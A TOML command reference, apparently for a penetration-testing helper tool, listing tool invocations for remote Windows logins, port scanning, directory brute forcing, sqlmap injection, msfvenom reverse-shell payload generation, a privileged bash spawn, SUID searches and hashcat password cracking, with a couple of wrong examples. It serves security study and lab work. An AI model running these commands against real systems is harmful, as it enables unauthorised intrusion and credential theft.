title = "Pentest commands"

# Basic configurations
max_events = 100
destination = "127.0.0.1"


# ============================
#         ALL COMMANDS 
# ============================

# ===== NETWORK COMMANDS =====
[command.evilwinrm0]
name_exe = "evil-winrm"
cmd_types = "network"
args = "-i <ip|127.0.0.1> -u <username> -p <password>"
explanation = """
Connect to an Windows machine. Few problem may occur with this tool, then do: `export OPENSSL_CONF=/home/user/evilwinrm.conf` 

This file (.conf) must contains this:
```
openssl_conf = openssl_init
[openssl_init]
providers = provider_sect
[provider_sect]
default = default_sect
legacy = legacy_sect
[default_sect]
activate = 1
[legacy_sect]
activate = 1
```"""
examples = [
    "evil-winrm -i 127.0.0.1 -u 'domain\\username' -p 'password'"
]
[command.remmina0]
name_exe = "remmina"
cmd_types = "network"
args = "-c rdp://<user:password>@<ip|127.0.0.1>"
explanation = """
Connect with GUI to an Windows machine with RDP protocol.
"""
examples = [
    "remmina -c rdp://user:password@127.0.0.1"
]
[command.xfreerdp0]
name_exe = "xfreerdp"
cmd_types = "network"
args = "/u:<user> /p:<password> /v:<ip|127.0.0.1>"
explanation = """
Connect with GUI to an Windows machine with RDP protocol.
"""
examples = [
    "xfreerdp /u:user /p:password /v:127.0.0.1"
]


# ===== SYSADMIN COMMANDS =====
[command.shell0]
name_exe = "python3"
cmd_types = "sysadmin"
explanation = "Upgrade shell for more flexibility"
args = "-c 'import os; os.system(\"/bin/bash -p\")'"
[command.capabilities0]
name_exe = "getcap"
cmd_types = "sysadmin"
explanation = "Search binaries with capabilities (often require sudo)"
args = "-r / 2>/dev/null"
examples = [
    "sudo getcap -r / 2>/dev/null",
    "sudo getcap /usr/bin/ping"
]
[command.ip0]
name_exe = "ip"
cmd_types = "sysadmin"
explanation = "Put up/down an interface"
args = "link set dev <interface> <status|down>"
examples = [
    "link set dev eth0 down",
    "link set dev eth0 up"
]
[command.ufw0]
name_exe = "ufw"
cmd_types = "sysadmin"
explanation = "Allow ip to contacted our machine"
args = "allow from <target>"
examples = [
    "ufw allow from 192.168.0.101"
]
[command.icacls0]
name_exe = "icacls"
cmd_types = "sysadmin"
explanation = "Check file/folder permission for users"
args = "<path>"

# ===== PENTEST COMMANDS =====
[command.nmap0]
name_exe = "nmap"
cmd_types = "pentest|network"
explanation = "Scanning all ports with SYN scan and saving in file"
args = "-sV -sS -Pn -p- -oN <output_file|scan.txt> <destination|127.0.0.1>"
examples = [
    "nmap -sV -sS -Pn -p- -oN scan.nmap 127.0.0.1"
]
[command.nmap1]
name_exe = "nmap"
cmd_types = "pentest|network"
explanation = "Version -sV, default script -sC"
args = "-sC -sV <ip|127.0.0.1>"
examples = [
    "nmap -sC -sV 127.0.0.1"
]
[command.dnsenum0]
name_exe = "dnsenum"
cmd_types = "pentest|network"
explanation = "DNS Enumeration"
args = "<hostname>"
examples = [
    "dnsenum example.com"
]
[command.host0]
name_exe = "host"
cmd_types = "pentest|network"
explanation = "DNS Enumeration with type handling"
args = "-t <type|any> <hostname>"
examples = [
    "dnsenum -t mx example.com"
]
[command.ffuf0]
name_exe = "ffuf"
cmd_types = "pentest"
explanation = "Bruteforce directory, FUZZ keyword is mandatory and a `/` at the end also otherwise it's not gonna work"
args = "-w <list_path|file.txt> -u <url|http://localhost>/FUZZ/ -t 100"
examples = [
    "ffuf -u http://localhost/FUZZ/ -w /opt/SecLists/Discovery/Web-Content/directory-list-2.3-small.txt"
]
[command.ffuf1]
name_exe = "ffuf"
cmd_types = "pentest"
explanation = "Bruteforce subdomain"
args = "-w <list_path|file.txt:FHOST> -u <url|http://localhost/> -H <header|'Host:FHOST.localhost'> -t 100"
examples = [
    "ffuf -w '/opt/SecLists/Discovery/DNS/subdomains-top1million-5000.txt:FHOST' -u 'http://localhost/' -H 'Host:FHOST.localhost' -t 100"
]
[command.sqlmap0]
name_exe = "sqlmap"
cmd_types = "pentest"
explanation = "SQL injection of username/password"
args = "-u <url|'http://127.0.0.1/login'> --data <data|'username=admin&password=password'>"
examples = [
    "sqlmap -u 'http://searcher.htb/search' --data 'username=admin&password=password'"
]
[command.dirb0]
name_exe = "dirb"
cmd_types = "pentest"
explanation = "Bruteforce url paths"
args = "<url|http://127.0.0.1/> <list>"
examples = [
    "dirb http://10.10.11.242/ /opt/SecLists/Discovery/Web-Content/directory-list-2.3-medium.txt"
]
[command.find0]
name_exe = "find"
cmd_types = "pentest|sysadmin"
explanation = "Find binaries with SUID bit set"
args = "/ -perm -4000 2> /dev/null"
examples = [
    "find / -perm -4000 2> /dev/null"
]
[command.msfvenom0]
name_exe = "msfvenom"
cmd_types = "pentest"
explanation = "Create reverse shell tcp"
args = "-p <payload|windows/shell_reverse_tcp> LHOST=<ip|127.0.0.1> LPORT=<port|4444> -f <type|exe> > reverse_tcp.exe"
examples = [
    "msfvenom -p payload|windows/shell_reverse_tcp LHOST=127.0.0.1 LPORT=4444 -f exe > reverse_tcp.exe"
]
[command.hashcat0]
name_exe = "hashcat"
cmd_types = "pentest"
explanation = """
Crack password of a chosen <type>.
This can be combined with hashid to find type of hash:
$ hashid <hash>"""
args = "-m <type> <hashfile|hash.txt> <wordlist|/usr/share/wordlists/rockyou.txt>"
examples = [
    "hashcat -m 3200 hash.txt /usr/share/wordlists/rockyou.txt"
]
[command.pspy64s0]
name_exe = "pspy64s"
cmd_types = "pentest"
explanation = """
Pspy is a command line tool designed to snoop on processes without need for root permissions.
It allows you to see commands run by other users, cron jobs, etc. as they execute."""
args = "-i <milli|100>"
examples = [
    "pspy64s -i 100"
]

# ===== REVERSE COMMANDS =====
[command.objdump0]
name_exe = "objdump"
cmd_types = "reverse"
explanation = "Display information from the binary in <type> format"
args = "-D <binary> -M <type|intel>"
examples = [
    "obdjump -M intel -D bin",
    "objdump -dj .rodata loop -M intel"
]
